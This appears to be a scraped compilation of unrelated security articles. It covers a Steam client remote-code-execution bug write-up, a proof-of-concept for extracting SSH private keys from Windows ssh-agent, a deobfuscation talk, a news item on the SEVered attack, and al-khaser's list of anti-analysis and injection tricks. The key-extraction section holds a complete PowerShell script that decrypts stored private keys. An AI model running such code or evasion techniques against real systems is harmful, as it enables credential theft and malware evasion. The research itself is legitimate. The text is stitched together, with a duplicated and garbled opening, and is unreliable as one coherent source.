This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Extracting SSH Private Keys from Windows 10 ssh-agent

Intro

This weekend I installed the Windows 10 Spring Update, and was pretty excited to start playing with the new, builtin OpenSSH tools.

Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included.

I found some references to using the new Windows ssh-agent in this MSDN article, and this part immediately grabbed my attention:

Securely store private keys

I’ve had some good fun in the past with hijacking SSH-agents, so I decided to start looking to see how Windows is «securely» storing your private keys with this new service.

I’ll outline in this post my methodology and steps to figuring it out. This was a fun investigative journey and I got better at working with PowerShell.

tl;dr

Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry

Using OpenSSH in Windows 10

The first thing I tested was using the OpenSSH utilities normally to generate a few key-pairs and adding them to the ssh-agent.

First, I generated some password protected test key-pairs using ssh-keygen.exe:

Powershell ssh-keygen

Then I made sure the new ssh-agent service was running, and added the private key pairs to the running agent using ssh-add:

Powershell ssh-add

Running ssh-add.exe -L shows the keys currently managed by the SSH agent.

Finally, after adding the public keys to an Ubuntu box, I verified that I could SSH in from Windows 10 without needing the decrypt my private keys (since ssh-agent is taking care of that for me):

Powershell SSH to Ubuntu

Monitoring SSH Agent

To figure out how the SSH Agent was storing and reading my private keys, I poked around a little and started by statically examining ssh-agent.exe. My static analysis skills proved very weak, however, so I gave up and just decided to dynamically trace the process and see what it was doing.

I used procmon.exe from Sysinternals and added a filter for any process name containing «ssh».

With procmon capturing events, I then SSH’d into my Ubuntu machine again. Looking through all the events, I saw ssh.exe open a TCP connection to Ubuntu, and then finally saw ssh-agent.exe kick into action and read some values from the Registry:

SSH Procmon

Two things jumped out at me:

  • The process ssh-agent.exe reads values from HKCU\Software\OpenSSH\Agent\Keys
  • After reading those values, it immediately opens dpapi.dll

Just from this, I now knew that some sort of protected data was being stored in and read from the Registry, and ssh-agent was using Microsoft’s Data Protection API

Testing Registry Values

Sure enough, looking in the Registry, I could see two entries for the keys I added using ssh-add. The key names were the fingerprint of the public key, and a few binary blobs were present:

Registry SSH Entries

Registry SSH Values

After reading StackOverflow for an hour to remind myself of PowerShell’s ugly syntax (as is tradition), I was able to pull the registry values and manipulate them. The «comment» field was just ASCII encoded text and was the name of the key I added:

Powershell Reg Comment

The (default) value was just a byte array that didn’t decode to anything meaningful. I had a hunch this was the «encrypted» private key if I could just pull it and figure out how to decrypt it. I pulled the bytes to a Powershell variable:

Powershell keybytes

Unprotecting the Key

I wasn’t very familiar with DPAPI, although I knew a lot of post exploitation tools abused it to pull out secrets and credentials, so I knew other people had probably implemented a wrapper. A little Googling found me a simple oneliner by atifaziz that was way simpler than I imagined (okay, I guess I see why people like Powershell…. 😉 )

Add-Type AssemblyName System.Security;
[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type raw (Join-Path $env:USERPROFILE foobar))), $null, ‘CurrentUser’))

I still had no idea whether this would work or not, but I tried to unprotect the byte array using DPAPI. I was hoping maybe a perfectly formed OpenSSH private key would just come back, so I base64 encoded the result:

Add-Type -AssemblyName System.Security  
$unprotectedbytes = [Security.Cryptography.ProtectedData]::Unprotect($keybytes, $null, 'CurrentUser')

[System.Convert]::ToBase64String($unprotectedbytes)

The Base64 returned didn’t look like a private key, but I decoded it anyway just for fun and was very pleasantly surprised to see the string «ssh-rsa» in there! I had to be on the right track.

Base 64 decoded

Figuring out Binary Format

This part actually took me the longest. I knew I had some sort of binary representation of a key, but I could not figure out the format or how to use it.

I messed around generating various RSA keys with opensslputtygen and ssh-keygen, but never got anything close to resembling the binary I had.

Finally after much Googling, I found an awesome blogpost from NetSPI about pulling out OpenSSH private keys from memory dumps of ssh-agent on Linux: https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/

Could it be that the binary format is the same? I pulled down the Python scriptlinked from the blog and fed it the unprotected base64 blob I got from the Windows registry:

parse_mem.py

It worked! I have no idea how the original author soleblaze figured out the correct format of the binary data, but I am so thankful he did and shared. All credit due to him for the awesome Python tool and blogpost.

Putting it all together

After I had proved to myself it was possible to extract a private key from the registry, I put it all together in two scripts.

GitHub Repo

The first is a Powershell script (extract_ssh_keys.ps1) which queries the Registry for any saved keys in ssh-agent. It then uses DPAPI with the current user context to unprotect the binary and save it in Base64. Since I didn’t even know how to start parsing Binary data in Powershell, I just saved all the keys to a JSON file that I could then import in Python. The Powershell script is only a few lines:

$path = "HKCU:\Software\OpenSSH\Agent\Keys\"

$regkeys = Get-ChildItem $path | Get-ItemProperty

if ($regkeys.Length -eq 0) {  
    Write-Host "No keys in registry"
    exit
}

$keys = @()

Add-Type -AssemblyName System.Security;

$regkeys | ForEach-Object {
    $key = @{}
    $comment = [System.Text.Encoding]::ASCII.GetString($_.comment)
    Write-Host "Pulling key: " $comment
    $encdata = $_.'(default)'
    $decdata = [Security.Cryptography.ProtectedData]::Unprotect($encdata, $null, 'CurrentUser')
    $b64key = [System.Convert]::ToBase64String($decdata)
    $key[$comment] = $b64key
    $keys += $key
}

ConvertTo-Json -InputObject $keys | Out-File -FilePath './extracted_keyblobs.json' -Encoding ascii  
Write-Host "extracted_keyblobs.json written. Use Python script to reconstruct private keys: python extractPrivateKeys.py extracted_keyblobs.json"  

I heavily borrowed the code from parse_mem_python.py by soleblaze and updated it to use Python3 for the next script: extractPrivateKeys.py. Feeding the JSON generated from the Powershell script will output all the RSA private keys found:

Extracting private keys

These RSA private keys are unencrypted. Even though when I created them I added a password, they are stored unencrypted with ssh-agent so I don’t need the password anymore.

To verify, I copied the key back to a Kali linux box and verified the fingerprint and used it to SSH in!

Using the key

Next Steps

Obviously my PowerShell-fu is weak and the code I’m releasing is more for PoC. It’s probably possible to re-create the private keys entirely in PowerShell. I’m also not taking credit for the Python code — that should all go to soleblaze for his original implementation.

CONTROL FLOW DEOBFUSCATION VIA ABSTRACT INTERPRETATION

I present some work that I did involving automatic deobfuscation of obfuscated control flow constructs with abstract interpretation.  Considering the image below, this project is responsible for taking graphs like the one on the left (where most of the «conditional» branches actually only go in one direction and are only present to thwart static analysis) and converting them into graphs like the one on the right.

Much work on deobfuscation relies on pattern-matching at least to some extent; I have coded such tools myself.  I have some distaste for such methods, since they stop working when the patterns change (they are «syntactic»).  I prefer to code my deobfuscation tools as generically («semantically») as possible, such that they capture innate properties of the obfuscation method in question, rather than hard-coding individual instances of the obfuscation.

The slides present a technique based on abstract interpretation, a form of static program analysis, for deobfuscating control flow transfers.  I translate the x86 code into a different («intermediate») language, and then perform an analysis based on three-valued logic over the translated code.  The end result is that certain classes of opaque predicates (conditional jumps that are either always taken or always not taken) are detected and resolved.  I have successfully used this technique to break several protections making use of similar obfuscation techniques.

Although I invented and implemented these techniques independently, given the wealth of work in program analysis, it wouldn’t surprise me to learn that the particular technique has been previously invented.  Proper references are appreciated.

Code is also included.  The source relies upon my Pandemic program analysis framework, which is not publicly available.  Hence, the code is for educational purposes only.  Nonetheless, I believe it is one of very few examples of publicly-available source code involving abstract interpretation on binaries.

PPTX presentationOCaml source code (for educational purposes only — does not include my framework.)

Researchers Defeat AMD’s SEV Virtual Machine Encryption

Researchers defeat AMD’s Secure Encrypted Virtualization (SEV), demonstrating #SEVered attack that could allow malicious hypervisor to steal plain-text data from an encrypted virtual machine.

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD’s Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.

AMD’s Secure Encrypted Virtualization (SEV) technology, which comes with EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.

Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of lack in the integrity protection of the page-wise encryption of the main memory, allowing a malicious hypervisor to extract the full content of the main memory in plaintext from SEV-encrypted VMs.

Here’s the outline of the SEVered attack, as briefed in the paper: SEVered: Subverting AMD’s Virtual Machine Encryption

«While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.

«This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside.»

«We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM’s memory in plaintext.»

During their tests, the team was able to extract a test server’s entire 2GB memory data, which also included data from another guest VM.

In their experimental setup, the researchers used a with the Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running web services—the Apache and Nginx web servers—as well as an SSH server, OpenSSH web server in separate VMs.

 

Anti-VM techniques — Hyper-V/VPC registry key + WMI queries on Win32_BIOS, Win32_ComputerSystem, MSAcpi_ThermalZoneTemperature, more MAC for Xen, Parallels

Introduction

al-khaser is a PoC «malware» application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar.

Logo

Download

You can download the latest release here.

Possible uses

  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don’t hesitate to contribute.

Features

Anti-debugging attacks

  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environement Block (BeingDebugged)
  • Process Environement Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHanlde (NtClose) Invalide Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread
  • TLS callbacks
  • Process jobs
  • Memory write watching

Anti-Dumping

  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]

  • RDTSC (with CPUID to force a VM Exit)
  • RDTSC (Locky version with GetProcessHeap & CloseHandle)
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • IcmpSendEcho (CCleaner Malware)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]

  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba — Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation

  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemManufacturer) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemProductName) (VMWARE)
  • Registry Keys artifacts
    • HARDWARE\ACPI\DSDT\VBOX__ (VBOX)
    • HARDWARE\ACPI\FADT\VBOX__ (VBOX)
    • HARDWARE\ACPI\RSDT\VBOX__ (VBOX)
    • SOFTWARE\Oracle\VirtualBox Guest Additions (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxGuest (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxMouse (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxService (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxSF (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxVideo (VBOX)
    • SOFTWARE\VMware, Inc.\VMware Tools (VMWARE)
    • SOFTWARE\Wine (WINE)
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters (HYPER-V)
  • File system artifacts
    • «system32\drivers\VBoxMouse.sys»
    • «system32\drivers\VBoxGuest.sys»
    • «system32\drivers\VBoxSF.sys»
    • «system32\drivers\VBoxVideo.sys»
    • «system32\vboxdisp.dll»
    • «system32\vboxhook.dll»
    • «system32\vboxmrxnp.dll»
    • «system32\vboxogl.dll»
    • «system32\vboxoglarrayspu.dll»
    • «system32\vboxoglcrutil.dll»
    • «system32\vboxoglerrorspu.dll»
    • «system32\vboxoglfeedbackspu.dll»
    • «system32\vboxoglpackspu.dll»
    • «system32\vboxoglpassthroughspu.dll»
    • «system32\vboxservice.exe»
    • «system32\vboxtray.exe»
    • «system32\VBoxControl.exe»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vm3dmp.sys»
    • «system32\drivers\vmci.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vmmemctl.sys»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmrawdsk.sys»
    • «system32\drivers\vmusbmouse.sys»
  • Directories artifacts
    • «%PROGRAMFILES%\oracle\virtualbox guest additions\»
    • «%PROGRAMFILES%\VMWare\»
  • Memory artifacts
    • Interupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • «\x08\x00\x27» (VBOX)
    • «\x00\x05\x69» (VMWARE)
    • «\x00\x0C\x29» (VMWARE)
    • «\x00\x1C\x14» (VMWARE)
    • «\x00\x50\x56» (VMWARE)
    • «\x00\x1C\x42» (Parallels)
    • «\x00\x16\x3E» (Xen)
  • Virtual devices
    • «\\.\VBoxMiniRdrDN»
    • «\\.\VBoxGuest»
    • «\\.\pipe\VBoxMiniRdDN»
    • «\\.\VBoxTrayIPC»
    • «\\.\pipe\VBoxTrayIPC»)
    • «\\.\HGFS»
    • «\\.\vmci»
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • System Firmware Tables
    • SMBIOS string checks (VirtualBox)
    • SMBIOS string checks (VMWare)
    • SMBIOS string checks (Qemu)
    • ACPI string checks (VirtualBox)
    • ACPI string checks (VMWare)
    • ACPI string checks (Qemu)
  • Driver Services
    • VirtualBox
    • VMWare
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe(VMWARE)
    • vmwaretray.exe(VMWARE)
    • vmwareuser(VMWARE)
    • VGAuthService.exe (VMWARE)
    • vmacthlp.exe (VMWARE)
    • vmsrvc.exe(VirtualPC)
    • vmusrvc.exe(VirtualPC)
    • prl_cc.exe(Parallels)
    • prl_tools.exe(Parallels)
    • xenservice.exe(Citrix Xen)
    • qemu-ga.exe (QEMU)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (GENERIC)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
    • SELECT * FROM Win32_Computer (Model and Manufacturer) (GENERIC)
    • SELECT * FROM MSAcpi_ThermalZoneTemperature CurrentTemperature) (GENERIC)
  • DLL Exports and Loaded DLLs
    • avghookx.dll (AVG)
    • avghooka.dll (AVG)
    • snxhk.dll (Avast)
    • kernel32.dll!wine_get_unix_file_nameWine (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)
  • CPU
    • Hypervisor presence using (EAX=0x1)
    • Hypervisor vendor using (EAX=0x40000000)
      • «KVMKVMKVM\0\0\0» (KVM)
        • «Microsoft Hv»(Microsoft Hyper-V or Windows Virtual PC)
        • «VMwareVMware»(VMware)
        • «XenVMMXenVMM»(Xen)
        • «prl hyperv «( Parallels) -«VBoxVBoxVBox»( VirtualBox)

Anti-Analysis

  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Macro malware attacks

  • Document_Close / Auto_Close.
  • Application.RecentFiles.Count

Code/DLL Injections techniques

  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Contributors

References